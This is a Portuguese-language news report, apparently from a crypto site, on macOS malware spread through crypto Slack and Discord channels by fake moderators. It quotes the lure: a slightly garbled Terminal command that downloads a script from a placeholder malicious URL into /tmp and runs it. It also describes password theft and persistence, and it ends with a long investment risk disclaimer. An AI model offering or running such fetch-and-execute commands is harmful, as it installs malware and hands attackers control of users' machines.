Problemas de segurança no Mac: novo malware atinge usuários de criptomoedas

0 Comentários

Pesquisadores de segurança descobriram um novo malware para macOS sendo anunciado em grupos de bate-papo como o Slack e Discord, relacionados a criptomoedas. Remco Verhoef, fundador da DutchSec, escreveu que viu criminosos se passando por administradores ou moderadores nos canais de criptos, colocando mensagens e recomendando que os usuários digitassem um longo comando no Terminal, o que poderia ajudar em vários problemas.

cd / tmp && curl -s curl $ MALICIOUS_URL> script && chmod + x script && ./script

O comando acima baixou um binário de 34 MB chamado “script” para a pasta/tmp e executou o código na máquina da vítima. Embora a Apple possa sinalizar e bloquear esse binário malicioso, até agora parece que as proteções da Apple não estão funcionando para os arquivos que estão sendo executados diretamente via Terminal.

Uma vez executado, o malware define o script como administrador e, em seguida, executa uma função para alterar as permissões. A vítima também é solicitada a digitar sua senha no Terminal, que é então roubada pelo malware e salva em/tmp/dumpdummy. O arquivo script tenta burlar o sistema para conseguir ser iniciado sempre que o sistema for reiniciado.

Leia também  BitPay lança cartão de débito de Bitcoin em parceria com a VISA

Embora seja um caso pobre de engenharia social, o ataque aparentemente tem funcionado, já que criminosos enganam os usuários para que executem esse comando para corrigir uma série de problemas em seus Macs. Uma vez conectado ao comando remoto e servidor de controle, os atacantes podem executar comandos arbitrários na máquina infectada. No entanto, seus recursos são supostamente limitados.

Uma preocupação, no entanto, é salvar a senha do seu Mac em texto sem formatação. Isso significa que, mesmo que os usuários removam o malware e a limpeza não seja completa, os futuros programas mal-intencionados podem ter acesso a esse arquivo armazenado localmente, não criptografado, com sua senha raiz.

“Ainda não sabemos exatamente o que os hackers por trás do malware podem pretender fazer com o acesso às máquinas infectadas”, escreveu Thomas Reed, da Malwarebytes. “Mas, dado o fato de que as comunidades de mineração de criptomoedas foram os alvos, é justo apostar que eles estavam interessados ​​em roubar criptomoedas.”

Aviso de risco: Investir em moedas digitais, ações, títulos e outros valores, mercadorias, divisas e outros produtos de investimento derivado (por exemplo, contratos por diferença, “CFD”) é especulativo e representa um nível elevado de risco. Cada investimento é único e envolve riscos únicos.

Os CFD e outros derivados são instrumentos complexos e têm um risco elevado de perda rápida de dinheiro devido a alavancagem. Deverá ponderar se compreende como o investimento funciona e se consegue suportar o risco elevado de perda do seu dinheiro.

As criptomoedas podem ter preços flutuantes e, por isso, não são adequados a todos os investidores. A negociação de criptomoedas não é supervisionada por qualquer enquadramento regulador da UE. O desempenho anterior não garante os resultados futuros. Qualquer histórico de negociação apresentado tem menos de 5 anos e, exceto quando indicado, não é suficiente como base de decisões de investimento. O seu capital está em risco.

Quando negoceia em ações, o seu capital está em risco.

O desempenho anterior não é um indicativo fiável de resultados futuros. O histórico de negociação apresentado tem menos de 5 anos e, exceto quando indicado, não é suficiente como base de decisões de investimento. Os preços podem tanto subir como descer, os preços podem flutuar bastante, pode estar exposto a flutuações de taxa de câmbio e pode perder todo ou mais capital do que o que investiu. O investimento não é adequado para todos, certifique-se de que compreendeu totalmente os riscos e legalidades envolvidas. Se não tiver a certeza, procure aconselhamento financeiro, legal, fiscal e/ou contabilístico. Este website não oferece aconselhamento financeiro, legal, fiscal ou contabilístico. Alguns links são links afiliados. Para mais informação, leia o nosso aviso e declaração de risco completo.